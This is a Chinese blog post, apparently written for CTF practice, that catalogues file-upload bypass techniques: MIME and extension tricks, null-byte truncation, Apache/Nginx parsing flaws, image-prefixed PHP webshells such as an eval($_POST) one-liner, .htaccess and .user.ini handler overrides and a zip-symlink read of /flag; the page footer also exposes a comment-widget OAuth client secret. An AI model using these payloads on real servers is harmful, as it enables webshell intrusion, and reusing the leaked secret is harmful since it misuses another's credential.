<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>文件上传备忘录 - UPONのblog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="UPONのblog"><meta name="msapplication-TileImage" content="/img/favicon.png"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="UPONのblog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta description="0x01 文件上传-前端拦截 | 懂得都懂，前端拦截&amp;#x3D;无效操作js检查代码12345678910111213141516171819&amp;#x2F;&amp;#x2F;upload-labs level1function checkFile() &amp;amp;#123;    var file &amp;#x3D; document.getElementsByName(&amp;amp;#x27;upload_file&amp;amp;#x27;)[0].value;    if"><meta property="og:type" content="blog"><meta property="og:title" content="UPON-2021の屋子"><meta property="og:url" content="https://upon-2021.github.io/"><meta property="og:site_name" content="UPON-2021の屋子"><meta property="og:description" content="0x01 文件上传-前端拦截 | 懂得都懂，前端拦截&amp;#x3D;无效操作js检查代码12345678910111213141516171819&amp;#x2F;&amp;#x2F;upload-labs level1function checkFile() &amp;amp;#123;    var file &amp;#x3D; document.getElementsByName(&amp;amp;#x27;upload_file&amp;amp;#x27;)[0].value;    if"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://upon-2021.github.io/img/avatar.png"><meta property="article:published_time" content="2022-10-31T07:17:02.326Z"><meta property="article:modified_time" content="2022-10-31T09:51:56.964Z"><meta property="article:author" content="UPON-2021"><meta property="article:tag" content="upload"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="/img/avatar.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"xn--upon-eu0gs25bb4r113aow1c.googles.icu/2022/10/31/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%A4%87%E5%BF%98%E5%BD%95/"},"headline":"UPONのblog","image":["/images/upload/1.png"],"datePublished":"2022-10-31T07:17:02.326Z","dateModified":"2022-10-31T09:51:56.964Z","author":{"@type":"Person","name":"UPON2021"},"description":"0x01 文件上传-前端拦截 | 懂得都懂，前端拦截&#x3D;无效操作js检查代码12345678910111213141516171819&#x2F;&#x2F;upload-labs level1function checkFile() &amp;#123;    var file &#x3D; document.getElementsByName(&amp;#x27;upload_file&amp;#x27;)[0].value;    if"}</script><link rel="canonical" href="xn--upon-eu0gs25bb4r113aow1c.googles.icu/2022/10/31/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%A4%87%E5%BF%98%E5%BD%95/"><link rel="icon" href="/img/favicon.png"><meta name="referrer" content="no-referrer-when-downgrade"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><meta name="generator" content="Hexo 5.0.2"></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.png" alt="UPONのblog" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/friend">友链</a><a class="navbar-item" href="/message">留言</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Join Gitter" href="https://gitter.im/hexo-theme-amazing/community"><i class="fab fa-gitter"></i></a><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/removeif/hexo-theme-amazing"><i class="fab fa-github"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><!--!--><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><i class="far fa-calendar-plus"> </i>2022-10-31  <a class="commentCountImg" href="/2022/10/31/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%A4%87%E5%BF%98%E5%BD%95/#comment-container"><span class="display-none-class">4f8f4b548fc6e107aa024ae996ce45d4</span><i class="far fa-comment-dots"></i> <span class="commentCount" id="4f8f4b548fc6e107aa024ae996ce45d4">99+</span>  </a><span class="level-item"><i class="far fa-clock"> </i>12 分钟  <i class="fas fa-pencil-alt"> </i>1.8 k</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">文件上传备忘录</h1><div class="content"><h1 id="0x01-文件上传-前端拦截-懂得都懂，前端拦截-x3D-无效操作"><a href="#0x01-文件上传-前端拦截-懂得都懂，前端拦截-x3D-无效操作" class="headerlink" title="0x01 文件上传-前端拦截 | 懂得都懂，前端拦截&#x3D;无效操作"></a>0x01 文件上传-前端拦截 | 懂得都懂，前端拦截&#x3D;无效操作</h1><h2 id="js检查代码"><a href="#js检查代码" class="headerlink" title="js检查代码"></a>js检查代码</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//upload-labs level1</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">checkFile</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> file = <span class="variable language_">document</span>.<span class="title function_">getElementsByName</span>(<span class="string">&#x27;upload_file&#x27;</span>)[<span class="number">0</span>].<span class="property">value</span>;</span><br><span class="line">    <span class="keyword">if</span> (file == <span class="literal">null</span> || file == <span class="string">&quot;&quot;</span>) &#123;</span><br><span class="line">        <span class="title function_">alert</span>(<span class="string">&quot;请选择要上传的文件!&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//定义允许上传的文件类型</span></span><br><span class="line">    <span class="keyword">var</span> allow_ext = <span class="string">&quot;.jpg|.png|.gif&quot;</span>;</span><br><span class="line">    <span class="comment">//提取上传文件的类型</span></span><br><span class="line">    <span class="keyword">var</span> ext_name = file.<span class="title function_">substring</span>(file.<span class="title function_">lastIndexOf</span>(<span class="string">&quot;.&quot;</span>));</span><br><span class="line">    <span class="comment">//判断上传文件类型是否允许上传</span></span><br><span class="line">    <span class="keyword">if</span> (allow_ext.<span class="title function_">indexOf</span>(ext_name + <span class="string">&quot;|&quot;</span>) == -<span class="number">1</span>) &#123;</span><br><span class="line">        <span class="keyword">var</span> errMsg = <span class="string">&quot;该文件不允许上传，请上传&quot;</span> + allow_ext + <span class="string">&quot;类型的文件,当前文件类型为：&quot;</span> + ext_name;</span><br><span class="line">        <span class="title function_">alert</span>(errMsg);</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>传个正常图，然后抓包修改就行了。</p>
<h1 id="0x02-文件上传-后端校验MINE-懂的都懂，还是无效操作"><a href="#0x02-文件上传-后端校验MINE-懂的都懂，还是无效操作" class="headerlink" title="0x02 文件上传-后端校验MINE | 懂的都懂，还是无效操作"></a>0x02 文件上传-后端校验MINE | 懂的都懂，还是无效操作</h1><h2 id="只校验MIME"><a href="#只校验MIME" class="headerlink" title="只校验MIME"></a>只校验MIME</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>] == <span class="string">&#x27;image/jpeg&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>无效操作，直接修改就完事了<br><img src="/images/upload/1.png"></p>
<p>常见MIMETYPE</p>
<blockquote>
<p>   audio&#x2F;mpeg -&gt; .mp3 application&#x2F;msword -&gt; .doc application&#x2F;octet-stream -&gt; .exe application&#x2F;pdf -&gt; .pdf application&#x2F;x-javascript -&gt; .js application&#x2F;x-rar -&gt; .rar application&#x2F;zip -&gt; .zip image&#x2F;gif -&gt; .gif image&#x2F;jpeg -&gt; .jpg &#x2F; .jpeg image&#x2F;png -&gt; .png text&#x2F;plain -&gt; .txt text&#x2F;html -&gt; .html video&#x2F;mp4 -&gt; .mp4</p>
</blockquote>
<h1 id="0x03-文件上传-扩展名校验-你这waf保熟吗？"><a href="#0x03-文件上传-扩展名校验-你这waf保熟吗？" class="headerlink" title="0x03 文件上传-扩展名校验 | 你这waf保熟吗？"></a>0x03 文件上传-扩展名校验 | 你这waf保熟吗？</h1><h2 id="姿势1-黑名单校验，但黑名单不全"><a href="#姿势1-黑名单校验，但黑名单不全" class="headerlink" title="姿势1: 黑名单校验，但黑名单不全"></a>姿势1: 黑名单校验，但黑名单不全</h2><p>其他后缀:<code>*.php</code>、<code>*.php3</code>、<code>*.php4</code>、<code>*.PHP</code>、<code>*.phtml</code>、<code>*.pht</code></p>
<h2 id="姿势2-白名单校验，但是有解析漏洞"><a href="#姿势2-白名单校验，但是有解析漏洞" class="headerlink" title="姿势2: 白名单校验，但是有解析漏洞"></a>姿势2: 白名单校验，但是有解析漏洞</h2><h3 id="截断绕过"><a href="#截断绕过" class="headerlink" title="截断绕过"></a>截断绕过</h3><blockquote>
<p>&#x2F;?upload&#x3D;shell.php%00.jpg -&gt; &#x2F;?upload&#x3D;shell.php</p>
</blockquote>
<h3 id="解析漏洞"><a href="#解析漏洞" class="headerlink" title="解析漏洞"></a>解析漏洞</h3><h4 id="Apache"><a href="#Apache" class="headerlink" title="Apache"></a>Apache</h4><p>服务器代码中限制了某些后缀的文件不允许上传，但是有些Apache是允许解析其它后缀的，例如在httpd.conf中如果配置有如下代码，则能够解析php和phtml文件</p>
<blockquote>
<p>AddType application&#x2F;x-httpd-php .php .phtml</p>
</blockquote>
<p>在Apache的解析顺序中，是从右到左开始解析文件后缀的，如果最右侧的扩展名不可识别，就继续往左判断，直到遇到可以解析的文件后缀为止。因此，例如上传的文件名为1.php.xxxx，因为后缀xxxx不可解析，所以向左解析后缀php。</p>
<blockquote>
<p>例如：shell.php.qwe.asd -&gt;shell.php</p>
</blockquote>
<h4 id="Nginx"><a href="#Nginx" class="headerlink" title="Nginx"></a>Nginx</h4><pre><code>Nginx默认是以CGI的方式支持PHP解析的，普遍的做法是在Nginx配置文件中通过 正则匹配设置SCRIPT_FILENAME。当访问www.xxx.com/phpinfo.jpg/1.php这个 URL时，$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”，然后构造成 SCRIPT_FILENAME传递给PHP CGI。

原因是开启了 fix_pathinfo 这个选项，会触发 在PHP中的如下逻辑： PHP会认为SCRIPT_FILENAME是phpinfo.jpg，而1.php是PATH_INFO，所以就会 将phpinfo.jpg作为PHP文件来解析了。
</code></pre>
<ul>
<li>形式： <a target="_blank" rel="noopener" href="http://www.xxxx.com/UploadFiles/image/1.jpg/1.php">www.xxxx.com/UploadFiles/image/1.jpg/1.php</a> <a target="_blank" rel="noopener" href="http://www.xxxx.com/UploadFiles/image/1.jpg%00.php">www.xxxx.com/UploadFiles/image/1.jpg%00.php</a> <a target="_blank" rel="noopener" href="http://www.xxxx.com/UploadFiles/image/1.jpg/%20/0.php">www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php</a></li>
<li>另一种方法：上传一个名字为test.jpg，然后访问test.jpg&#x2F;.php,在这个目录下就会生成一句话木马shell.php。</li>
</ul>
<h1 id="0x04-文件上传-内容检测-这文件要是有长有短，我直接吃了它"><a href="#0x04-文件上传-内容检测-这文件要是有长有短，我直接吃了它" class="headerlink" title="0x04 文件上传-内容检测 | 这文件要是有长有短，我直接吃了它"></a>0x04 文件上传-内容检测 | 这文件要是有长有短，我直接吃了它</h1><h2 id="1-magic-number-你不劈开这文件咋知道它熟不熟啊"><a href="#1-magic-number-你不劈开这文件咋知道它熟不熟啊" class="headerlink" title="1.magic number | 你不劈开这文件咋知道它熟不熟啊"></a>1.magic number | 你不劈开这文件咋知道它熟不熟啊</h2><blockquote>
<p>magic number，它可以用来标记文件或者协议的格式，很多文件都有幻数标志来表明该文件的格式。</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GIF89a</span><br><span class="line">(...some binary data for image...)</span><br><span class="line">&lt;?php phpinfo(); ?&gt;</span><br><span class="line">(... skipping the rest of binary data ...)</span><br></pre></td></tr></table></figure>

<h2 id="2-过滤-lt-以及php"><a href="#2-过滤-lt-以及php" class="headerlink" title="2.过滤&lt;?以及php"></a>2.过滤&lt;?以及php</h2><blockquote>
<script language='php'>@eval($_POST[cmd]);</script>
<?= @eval($_POST['cmd']);?><p> &#x2F;&#x2F;需要php.ini开启短标签</p>
</blockquote>
<h2 id="3-正则替换"><a href="#3-正则替换" class="headerlink" title="3.正则替换"></a>3.正则替换</h2><p>老生常谈，双写 or 其他</p>
<h2 id="4-二次渲染-你TM劈我文件是吧"><a href="#4-二次渲染-你TM劈我文件是吧" class="headerlink" title="4.二次渲染 | 你TM劈我文件是吧"></a>4.二次渲染 | 你TM劈我文件是吧</h2><p>对渲染&#x2F;加载测试的攻击方式是代码注入绕过。使用winhex在不破坏文件本身的渲染情况下找一个空白区进行填充代码，一般为图片的注释区。<br>对二次渲染的攻击方式就是攻击文件加载器自身</p>
<h1 id="0x05文件上传-配置文件-看，吸铁石"><a href="#0x05文件上传-配置文件-看，吸铁石" class="headerlink" title="0x05文件上传-配置文件 | 看，吸铁石"></a>0x05文件上传-配置文件 | 看，吸铁石</h1><h2 id="htaccess"><a href="#htaccess" class="headerlink" title=".htaccess"></a>.htaccess</h2><p>只是适用于apache，如果变成niginx或者iis则不会被解析<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/shana_8/article/details/104827642">文件上传漏洞之.htaccess</a></p>
<pre><code>.htaccess文件（“分布式配置文件”）提供了针对目录改变配置的方法， 即，在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用于此目录及其所有子目录。作为用户，所能使用的命令将受到限制。管理员可以通过Apache的AllowOverride指令来设置。
</code></pre>
<p>具体实现：</p>
<p>1、上传.htaccess文件至服务器上传目录，此时apache在解析该目录下的php时将按照文件要求。只要文件名匹配到所定义的字符串，就会将该文件当作php解析。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch &quot;shana&quot;&gt;</span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br></pre></td></tr></table></figure>

<p>2、上传.htaccess文件设置的关键字的文件名，即上传一个黑名单没有过滤的随意后缀名文件，但文件名中一定要包含shana，如”shana.jpg”，内容为一句话木马。此时”shana.jpg”会被Apache当作php解析。</p>
<h2 id="user-ini"><a href="#user-ini" class="headerlink" title=".user.ini"></a>.user.ini</h2><p>很通用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//.user.ini</span><br><span class="line"></span><br><span class="line">GIF89a</span><br><span class="line">auto_prepend_file=xxx</span><br></pre></td></tr></table></figure>
<p>会自动包含<code>xxx</code></p>
<h2 id="系统特性"><a href="#系统特性" class="headerlink" title="系统特性"></a>系统特性</h2><p>仅适用windows平台<br>windows 系统会自动删</p>
<p><del>源码一开天地灭，选择视窗保平安</del></p>
<h1 id="0x06-文件上传-条件竞争-你是故意来找猹？"><a href="#0x06-文件上传-条件竞争-你是故意来找猹？" class="headerlink" title="0x06 文件上传-条件竞争 | 你是故意来找猹？"></a>0x06 文件上传-条件竞争 | 你是故意来找猹？</h1><p>文件能传，但是传进去后就给你删了，通常情况下需要一边传一边访问,或者利用环境，让php迟一点删文件</p>
<h1 id="0x07-文件上传-解压报错-你这压缩包是金子做的还是文件是金子做的"><a href="#0x07-文件上传-解压报错-你这压缩包是金子做的还是文件是金子做的" class="headerlink" title="0x07 文件上传-解压报错 | 你这压缩包是金子做的还是文件是金子做的"></a>0x07 文件上传-解压报错 | 你这压缩包是金子做的还是文件是金子做的</h1><p>这种情况要求比较高了，需要后端解压压缩包<br><a target="_blank" rel="noopener" href="https://www.yongsheng.site/2022/06/17/Dest0g3%20520/">Dest0g3 520迎新赛 ezip</a><br>原理:创建一个解压到一半会报错的文件，然后遗留shell文件getshell</p>
<h1 id="0x08-文件上传-软连接"><a href="#0x08-文件上传-软连接" class="headerlink" title="0x08 文件上传-软连接"></a>0x08 文件上传-软连接</h1><p>传快捷方式进去，离谱</p>
<p>要求后端会解压文件</p>
<pre><code>ln -s /flag flag 
zip -y flag.zip flag
</code></pre>
<h1 id="NaN-upload-exp-这里放一些常用的文件上传，会继续更新"><a href="#NaN-upload-exp-这里放一些常用的文件上传，会继续更新" class="headerlink" title="NaN upload-exp 这里放一些常用的文件上传，会继续更新"></a>NaN upload-exp 这里放一些常用的文件上传，会继续更新</h1><h2 id="1-前端文件上传"><a href="#1-前端文件上传" class="headerlink" title="1.前端文件上传"></a>1.前端文件上传</h2><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">id</span>=<span class="string">&quot;upload-form&quot;</span> <span class="attr">action</span>=<span class="string">&quot;目标网站&quot;</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span> <span class="attr">enctype</span>=<span class="string">&quot;multipart/form-data&quot;</span> &gt;</span></span><br><span class="line">　　　<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;file&quot;</span> <span class="attr">id</span>=<span class="string">&quot;upload_file&quot;</span> <span class="attr">name</span>=<span class="string">&quot;upload_file&quot;</span> /&gt;</span> <span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line">　　　<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">name</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;上传&quot;</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>后端接收代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) &#123;</span><br><span class="line">        <span class="keyword">if</span> ((<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>] == <span class="string">&#x27;image/jpeg&#x27;</span>) || (<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>] == <span class="string">&#x27;image/png&#x27;</span>) || (<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>] == <span class="string">&#x27;image/gif&#x27;</span>)) &#123;</span><br><span class="line">            <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">            <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">&#x27;/&#x27;</span> . <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>];          </span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) &#123;</span><br><span class="line">                <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&#x27;上传出错！&#x27;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&#x27;文件类型不正确，请重新上传！&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="variable">$msg</span> = UPLOAD_PATH.<span class="string">&#x27;文件夹不存在,请手工创建！&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>**注:**前端的<code>&lt;input type=&quot;file&quot; id=&quot;upload_file&quot; name=&quot;upload_file&quot; /&gt;</code>中<code>name=upload_file</code>对应后端代码的<code>$_FILES[&#39;upload_file&#39;]</code>,前端的<code>&lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;上传&quot; /&gt;</code>中<code>name=&quot;submit&quot;</code>对应后端代码的<code>isset($_POST[&#39;submit&#39;])</code>,实战环境中还是需要对具体环境进行一些修改</p>
<h2 id="2-htaccess文件"><a href="#2-htaccess文件" class="headerlink" title="2. .htaccess文件"></a>2. .htaccess文件</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch &quot;shana&quot;&gt;</span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br><span class="line"></span><br><span class="line">或者</span><br><span class="line"></span><br><span class="line">AddType application/x-httpd-php .png </span><br></pre></td></tr></table></figure>

<h2 id="3-user-ini文件"><a href="#3-user-ini文件" class="headerlink" title="3. .user.ini文件"></a>3. .user.ini文件</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">auto_prepend_file=xxx</span><br></pre></td></tr></table></figure>
<p>鲁棒性非常好，甚至可以</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GIF89a</span><br><span class="line">auto_prepend_file=xxx</span><br></pre></td></tr></table></figure>
<p>自动包含<code>xxx</code></p>
<h1 id="Refence"><a href="#Refence" class="headerlink" title="Refence:"></a>Refence:</h1><p><a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html">狼组安全团队公开知识库 </a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/huajiaobuxiango/p/15968800.html">upload-labs通关攻略</a><br><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/335959.html">文件上传总结</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/shana_8/article/details/104827642">文件上传漏洞之.htaccess</a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/sijidou/p/13121301.html">.user.ini导致文件上传绕过</a></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>文件上传备忘录</p><p><a href="xn--upon-eu0gs25bb4r113aow1c.googles.icu/2022/10/31/文件上传备忘录/">xn--upon-eu0gs25bb4r113aow1c.googles.icu/2022/10/31/文件上传备忘录/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><a href="xn--upon-eu0gs25bb4r113aow1c.googles.icu"><p>UPON2021</p></a></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2022-10-31</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2022-10-31</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a class="icon" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a><a class="icon" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="recommend-area"><div class="recommend-post"><span class="is-size-6 has-text-grey has-mr-7"># 相关文章</span><br><span>  1.<a class="is-size-6" href="/2022/10/28/das10%E5%A4%8D%E7%8E%B0/" target="_blank">DasCTF 十月月赛复现</a><br></span><span>  2.<a class="is-size-6" href="/2022/10/18/Round6/" target="_blank">Round 6复现</a><br></span><span>  3.<a class="is-size-6" href="/2022/10/12/HNctf/" target="_blank"> </a><br></span><span>  4.<a class="is-size-6" href="/2022/10/10/%E5%81%9A%E9%A2%98%E5%AF%84%E5%BD%95/" target="_blank">BUU做题寄录</a><br></span><span>  5.<a class="is-size-6" href="/2022/10/06/sql/" target="_blank">SQL注入学习寄录</a><br></span><span>  6.<a class="is-size-6" href="/2022/10/04/solidity/" target="_blank">Ethernaut刷题记录</a><br></span><span>  7.<a class="is-size-6" href="/2022/10/03/RCE/" target="_blank">命令执行备忘录</a><br></span><span>  8.<a class="is-size-6" href="/2022/09/30/mt-ctf/" target="_blank">美团CTF决赛复现 mako</a><br></span></div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2022/10/28/das10%E5%A4%8D%E7%8E%B0/"><span class="level-item">DasCTF 十月月赛复现</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--><div class="card"><div class="card-content"><div class="title is-5">评论</div><div id="comment-container"></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/gitalk/1.6.0/gitalk.css"><script> $.getScript('/js/gitalk.min.js', function () { 
            var gitalk = new Gitalk({
            language:'zh-CN',
            id: '4f8f4b548fc6e107aa024ae996ce45d4',
            repo: 'upon-2021.github.io',
            owner: 'UPON-2021',
            clientID: 'be835d1ee57b9ec974c1',
            clientSecret: '5b2d7f351be105e013f11fa0ebde21cbea192152',
            admin: ["UPON-2021"],
            createIssueManually: true,
            distractionFreeMode: false,
            perPage: 10,
            pagerDirection: 'last',
            proxy: 'https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token',
            
            enableHotKey: true,
            isLocked: false
        })
